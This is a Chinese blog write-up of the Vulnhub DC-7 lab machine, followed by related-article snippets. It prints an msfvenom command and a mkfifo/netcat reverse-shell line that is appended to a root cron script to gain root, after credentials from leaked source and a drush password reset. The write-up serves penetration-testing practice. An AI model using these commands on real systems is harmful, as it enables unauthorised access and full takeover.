靶机DC-7

最新推荐文章于 2024-08-08 08:45:00 发布
最新推荐文章于 2024-08-08 08:45:00 发布
阅读量345 收藏
点赞数
分类专栏: Vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43940853/article/details/103444738
版权

kali : 192.168.230.233
靶机 : 192.168.230.235
在这里插入图片描述
扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来
在这里插入图片描述
打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功
在这里插入图片描述
先进入了一个目录,查看文件后发现都是乱码
把目标放在mbox上
在这里插入图片描述
关注到邮件的Subject: Cron root@dc-7 /opt/scripts/backups.sh,查看该文件
在这里插入图片描述
发现是一些命令,我一开始猜测这应该是个定时命令提权,这些命令是一定会被执行的,接着只要把提权的命令放到这里面就可以了

但是我再写入命令发现不能写入命令,说明没有权限,这里我们查看一下他的权限

在这里插入图片描述
一直没怎么注重过权限的问题,今天也是正式的了解了一下
可以看到root

关于参数
https://blog.csdn.net/zhuoya_/article/details/77418413

登陆后发现了drush命令,可以利用这条命令修改账号密码
在这里插入图片描述
登陆成功后,反弹一个shell,因为Drupal 8不支持PHP代码,需要将php单独作为一个模块导入,这里就不演示了
在这里插入图片描述
直接上传一个shell反弹脚本

在这里弹了好长时间,都没反应,原来是忘了选择php代码,所以一直无法解析

本来想插一些命令到index.php当中的,结果没有权限,一开始我还奇怪,明明有可读可写权限的,如下图
在这里插入图片描述
后来发现只有www-data用户和www-data组有权限,当前用户是dc7user,这也是我们为什么要反弹的原因

一开始比较奇怪都ssh连接上了,直接搞它不就行了,原来还有权限的问题,因为以前反弹shell,都是自动反弹的www-data用户的,现在对ssh和反弹有了进一步的认识(虽然有些东西可能还不是很懂)

在这里插入图片描述
终于反弹过来了,接下来正式开始提权

刚刚已经知道www-data拥有读写文件的权限,下面利用msfvenom生成一个反弹shell的脚本加入到.sh文件中让他执行

在这里插入图片描述

命令:msfvenom -p cmd/unix/reverse_netcat lhost=192.168.230.233 lport=4444 R

下面将生成的payload加入到.sh文件中

echo "mkfifo /tmp/bqro; nc 192.168.230.233 4444 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> backups.sh

在这里插入图片描述
成功提权

这次对权限问题和msfvenom的使用,以及后门的生成有了进一步的认识

关于linux下各种一句话反弹shell的编写
https://www.cnblogs.com/linuxsec/articles/7683877.html
WuT0ng
关注
专栏目录
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5046
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
vulnhub之DC7靶机
LainWith的博客
02-14 1515
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
DC系列靶场---DC 7靶场的渗透测试
zhouA0221的博客
08-08 1356
通过 Drush,开发者可以在终端中执行常见的 Drupal 操作,如安装、更新、8、邮件通过脚本执行,每15分钟执行一次,把nc的反弹shell写入脚本文件,攻击端侦听,等待目标主机执行脚本。4、通过查看邮件发现使用了drupal中drush程序,这个工具可以更改用户的密码。这个时候要等,因为这个脚本文件是每15分钟执行一次,所以只需要等待就可以。3、在网站中登录发现不行,之前还扫到一个22端口,通过22端口远程登陆上。看到源码中有config的文件,这个肯定是配置文件,可以看一下。
DC-7靶场
mlws1900的博客
03-27 1109
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
渗透测试学习之靶机DC-7
xdbzdgx的博客
12-05 2592
1.下载靶机 本篇文章是DC靶机系列的第7篇,针对的是靶机DC-7,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-7的下载地址为DC: 7 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-7只有一个flag。 在VMware加载成功之后并开启,建议把DC-7靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
DC7-靶机
Au
11-30 1693
下载地址 下面是作者的一些提示,和爆破无关,需要Google~~~ 配置的环境: kali:192.168.25.131 DC7-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
靶机DC-1 11111
最新发布
09-25
靶机DC-1 11111
vulnhub靶机DC-1
cyzCc的博客
02-15 1023
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
靶机实战-DC-6
滕财然的博客
03-03 841
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
vulnhub靶机DC-7 渗透笔记
liver100day的博客
06-22 510
靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ 渗透过程 1.信息收集 1.1 信息收集 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 扫描到目标靶机IP地址为:192.168.75.151 也可以使用nmap扫描整个网段,确认存活主机 nmap -T4 192.168.75.0/24 同样扫描出了目标靶机IP
DC-7靶机
m0_62094846的博客
07-05 252
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.136 -p- -oN nmap136.Anmap -A -T4 192.168.61.136 -p- -oN nmap136.A有22和80端口下面有提示DC7USER百度一下可以下载一个文件这里也说明是重要点下载到kali本地git clone https://github.com/Dc7User/staffdbcd s
DC7靶机
qq_40646572的博客
05-11 201
信息搜集 开启DC7靶机 先看下DC7靶机下载页面是否有提示。 靶机作者提示,暴力破解,不可能,除非字典🐂。 先使用nmap扫描一下,看下靶机开放的端口。 Nmap扫描发现80端口以及22端口处于开启状态。 发现是drupal8cms系统。 发现没什么可以利用的信息。发现版权声明处存在一处不太对劲的信息,正常来讲此处应该是@drupal才对。 百度下,发现好多dc7靶机挑战者,用到了这个信息。此处信息是用于git信息搜集。 Github上直接搜集DC7USER。搜索到dc7靶机作者的账号,发现
DC-7靶机渗透
m0_62008601的博客
06-02 1065
dc-7靶机的渗透过程
入侵靶机DC-7
干铮的博客
10-08 1477
DC-7 1.主机发现 靶机开机后DHCP获取有ip地址 2.信息收集 端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 891
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
靶机练习 DC-7
weixin_43705814的博客
01-23 291
渗透测试靶机练习 DC-7 一、靶机介绍 与之前的靶机是一个系列可在该网站下载搭建 链接:https://www.vulnhub.com/ 二、搭建环境 查看靶机能否正常运行 作者提示写在最前: 如果您需要求助于暴力破解或字典攻击,您可能不会成功,也就是说断绝了暴力破解的道路。 话不多说开始渗透 三、获取Flag 1.进行主机发现发现靶机的ip并对靶机端口进行详细扫描 nmap 192.168.1.0/24 nmap -sS -sV -p- -A -O 192.168.1.100 开放了22与80
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1432
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值